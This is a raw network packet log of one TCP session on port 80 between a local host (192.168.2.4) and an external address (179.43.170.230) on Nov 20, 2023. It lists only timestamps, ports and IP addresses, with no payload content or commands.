Nov 20, 2023 05:21:13.083184004 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.083950043 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.083995104 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.086899042 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.086971998 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.090749979 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.090837955 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.090853930 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.090878010 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.095252037 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.095290899 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.095316887 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.095329046 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.096945047 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.096985102 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.096997023 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.097028017 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.098661900 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.098701000 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.098714113 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.098742962 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.099160910 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.099212885 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.104237080 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.104275942 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.104301929 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.104317904 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.107120991 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.107167959 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.107198000 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.107244968 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.108995914 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.109045982 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.114388943 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.114425898 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.114459038 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.114490032 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.116488934 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.116528034 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.116539955 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.116573095 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.116873980 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.116923094 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.118865013 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.118915081 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.119394064 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.119443893 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.121582985 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.121623993 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.121638060 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.121668100 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.122421980 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.122473955 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.130299091 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.130337000 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.130372047 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.131684065 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.131704092 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.131731987 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.131985903 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.132040024 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.134170055 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.134210110 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.134223938 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.134252071 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.198059082 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.198156118 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.198848009 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.198901892 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.200155973 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.200217009 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.202343941 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.202403069 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.204111099 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.204150915 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.204169989 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.204200983 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.205324888 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.205363035 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.205379963 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.205411911 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.206151962 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.206193924 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.206208944 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.206238031 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.207444906 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.207484961 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.207496881 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.207542896 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.209084034 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.209139109 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.209140062 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.209188938 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.209490061 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.209552050 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.209552050 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.209595919 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.210843086 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.210895061 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.212058067 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.212109089 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.213339090 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.213392019 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.214742899 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.214803934 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.215172052 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.215224981 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.218235016 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.218286991 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.219113111 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.219177961 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.220413923 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.220467091 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.220513105 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.220566988 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.225812912 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.225869894 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.226133108 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.226185083 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.229979038 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.230087996 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.231297016 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.231336117 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.231350899 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.231391907 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.232111931 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.232165098 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.233350039 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.233387947 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.233401060 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.233432055 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.234221935 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.234261036 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.234278917 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.234304905 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.234575987 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.234631062 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.234649897 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.234695911 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.235598087 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.235651016 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.238631010 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.238677025 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.239049911 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.239099979 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.240330935 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.240431070 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.242104053 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.242158890 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.243406057 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.243460894 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.243467093 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.243513107 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.245095015 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.245134115 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.245146990 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.245182991 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.252110958 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.252197027 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.252214909 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.252239943 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.253408909 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.253462076 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.256567955 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.256606102 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.256620884 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.256648064 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.257267952 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.257324934 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.260730028 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.260781050 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.260860920 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.260910034 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.261122942 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.261182070 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.262458086 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.262548923 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.262835979 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.262873888 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.262887955 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.262969017 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.264487028 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.264539957 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.265088081 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.265125990 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.265137911 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.265165091 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.266206980 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.266243935 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.266262054 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.266287088 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.267123938 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.267163038 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.267179012 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.267205000 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.268373966 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.268412113 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.268425941 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.268450975 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.269609928 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.269649982 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.269661903 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.269694090 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.269984007 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.270031929 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.271337986 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.271394014 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.272202015 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.272247076 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.272937059 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.273027897 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.273044109 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.273070097 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.274734020 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.274785995 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.275522947 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.275573969 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.280224085 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.280280113 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.283288002 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.283325911 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.283349991 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.283370018 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.285343885 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.285382986 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.285396099 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.285424948 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.286621094 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.286659002 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.286674023 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.286700964 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.287918091 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.287969112 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.288690090 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.288727999 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.288743973 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.288768053 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.289108992 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.289161921 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.290509939 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.290549994 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.290563107 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.290601015 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.293061972 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.293114901 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.298805952 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.298860073 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.299274921 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.299328089 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.300071955 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.300122976 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.301743031 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.301795959 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.304358959 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.304434061 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.305664062 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.305701971 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.305712938 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.305746078 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.306067944 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.306119919 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.306919098 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.306957006 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.306969881 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.307003975 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.310129881 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.310189009 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.317260027 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.317315102 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.324167013 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.324204922 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.324224949 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.324249029 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.325944901 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.325995922 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.327220917 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.327259064 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.327276945 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.327299118 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.331578970 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.331634998 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.332021952 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.332073927 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.333303928 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.333360910 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.335002899 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.335056067 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.335853100 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.335894108 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.335902929 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.335941076 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.338469028 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.338517904 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.339716911 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.339767933 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.344113111 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.344166040 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.344938040 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.344990969 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.352327108 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.352380037 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.352399111 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.352423906 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.354548931 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.354587078 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.354618073 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.354640961 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.354945898 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.355009079 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.356690884 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.356755972 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.366595030 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.366664886 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.367098093 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.367147923 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.369563103 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.369672060 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.371217966 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.371273041 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.374294996 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.374361038 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.380837917 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.380877972 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.380919933 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.380944014 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.387471914 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.387512922 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.387537956 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.387553930 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.392256975 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.392365932 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.392404079 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.392468929 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.393182993 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.393244982 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.394308090 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.394378901 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.398478985 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.398536921 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.398879051 CET	80	49731	179.43.170.230	192.168.2.4
